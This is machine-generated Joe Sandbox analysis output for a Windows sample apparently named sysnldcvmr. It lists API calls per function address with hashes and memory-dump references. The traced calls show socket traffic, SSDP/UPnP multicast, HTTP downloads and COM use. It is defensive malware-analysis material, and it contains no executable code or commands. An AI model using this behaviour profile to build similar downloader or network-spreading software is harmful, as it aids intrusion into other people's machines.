                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3966618661-0
                                                                    • Opcode ID: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                    • Instruction ID: 5b2b6301c056c53cf24b756eb28b55477e9028745ee4fe4862f5ad68d4db2f6a
                                                                    • Opcode Fuzzy Hash: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                    • Instruction Fuzzy Hash: 1841B371604A02AFC714EB39D848797F7A4BF88310F14827EE82D933D1E735A855CB99
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: _allshl
                                                                    • String ID:
                                                                    • API String ID: 435966717-0
                                                                    • Opcode ID: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                    • Instruction ID: 2f682f979519ea9f46037cdaf014f1fa89077d02b7b0d9f1a8f9fce332e03f2e
                                                                    • Opcode Fuzzy Hash: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                    • Instruction Fuzzy Hash: 62F03672A11419D79720EFFFD4424CAF7E59F88354B118676F818E3270E5709D1146F5
                                                                    APIs
                                                                    • GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                    • QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: DeviceDriveQueryType
                                                                    • String ID: \??\
                                                                    • API String ID: 1681518211-3047946824
                                                                    • Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                    • Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
                                                                    • Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                    • Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99
                                                                    APIs
                                                                    • memcpy.NTDLL(00000000,?,?), ref: 00407338
                                                                    • CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00407361
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleThreadmemcpy
                                                                    • String ID: .Mw
                                                                    • API String ID: 2064604595-2453323595
                                                                    • Opcode ID: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
                                                                    • Instruction ID: f93afe995e2a8aed0921a04be4342d20ba97acab7f8849ac526c8a5d2aa2879c
                                                                    • Opcode Fuzzy Hash: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
                                                                    • Instruction Fuzzy Hash: 20F090B1A04308FBDB00DFA4EC46F9E7378BB48704F244468F908A73C1D675AA10CB59
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleSize
                                                                    • String ID: .Mw
                                                                    • API String ID: 1378416451-2453323595
                                                                    • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                    • Instruction ID: 089911091b4f8663884f4f3f40455582f6b765449e30803f2281244f10637e16
                                                                    • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                    • Instruction Fuzzy Hash: FDF0C074A40308FBEB20DFA4DC49FDDBB78EB04711F208695FA05BB2D0D6B56A918B54
                                                                    APIs
                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                    • String ID:
                                                                    • API String ID: 3980219359-0
                                                                    • Opcode ID: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                    • Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
                                                                    • Opcode Fuzzy Hash: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                    • Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA
                                                                    APIs
                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                    • String ID:
                                                                    • API String ID: 2074799992-0
                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                    APIs
                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                    • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                    • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Recv$ErrorLastSleep
                                                                    • String ID:
                                                                    • API String ID: 3668019968-0
                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                    APIs
                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Send$ErrorLastSleep
                                                                    • String ID:
                                                                    • API String ID: 2121970615-0
                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                    • String ID:
                                                                    • API String ID: 2223660684-0
                                                                    • Opcode ID: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                    • Instruction ID: 0184f799374b3cbd514a588550e5351e3808897b1395f0a2de410330185c2ead
                                                                    • Opcode Fuzzy Hash: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                    • Instruction Fuzzy Hash: DF01F7352423009FC3209F26EC44ADB77E8AF49711F04443EE80697650EB34E545DB28
                                                                    APIs
                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
                                                                    • SysAllocString.OLEAUT32(00416268), ref: 00406FF3
                                                                    • CoUninitialize.OLE32 ref: 00407018
                                                                      • Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407012
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                    • String ID:
                                                                    • API String ID: 459949847-0
                                                                    • Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                    • Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
                                                                    • Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                    • Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56
                                                                    APIs
                                                                      • Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFreeInstanceString
                                                                    • String ID: Microsoft Corporation
                                                                    • API String ID: 586785272-3838278685
                                                                    • Opcode ID: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                    • Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
                                                                    • Opcode Fuzzy Hash: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                    • Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66
                                                                    APIs
                                                                      • Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
                                                                      • Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                      • Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                      • Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                      • Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                      • Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                      • Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                      • Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                      • Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
                                                                      • Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
                                                                      • Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                    • String ID: %S%S
                                                                    • API String ID: 1017111014-3267608656
                                                                    • Opcode ID: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                    • Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
                                                                    • Opcode Fuzzy Hash: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                    • Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5
                                                                    APIs
                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407A25), ref: 0040D64A
                                                                      • Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                      • Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
                                                                      • Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                      • Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                      • Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                      • Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                      • Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                      • Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                    • String ID: TCP$UDP
                                                                    • API String ID: 1519345861-1097902612
                                                                    • Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                    • Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
                                                                    • Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                    • Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                    • CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleObjectSingleWait
                                                                    • String ID: .Mw
                                                                    • API String ID: 528846559-2453323595
                                                                    • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                    • Instruction ID: d1fe1851c25795fdacbee2e877de448503af208f5fff4c31293181607202da8f
                                                                    • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                    • Instruction Fuzzy Hash: 3B11C574A04208EFCB04CF84D580E69B7B6FB89354F2081AAEC05AB385C735EE52DB95
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00415E30,?,?,?), ref: 00405EBF
                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
                                                                    • LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 469056452-0
                                                                    • Opcode ID: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                    • Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
                                                                    • Opcode Fuzzy Hash: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                    • Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A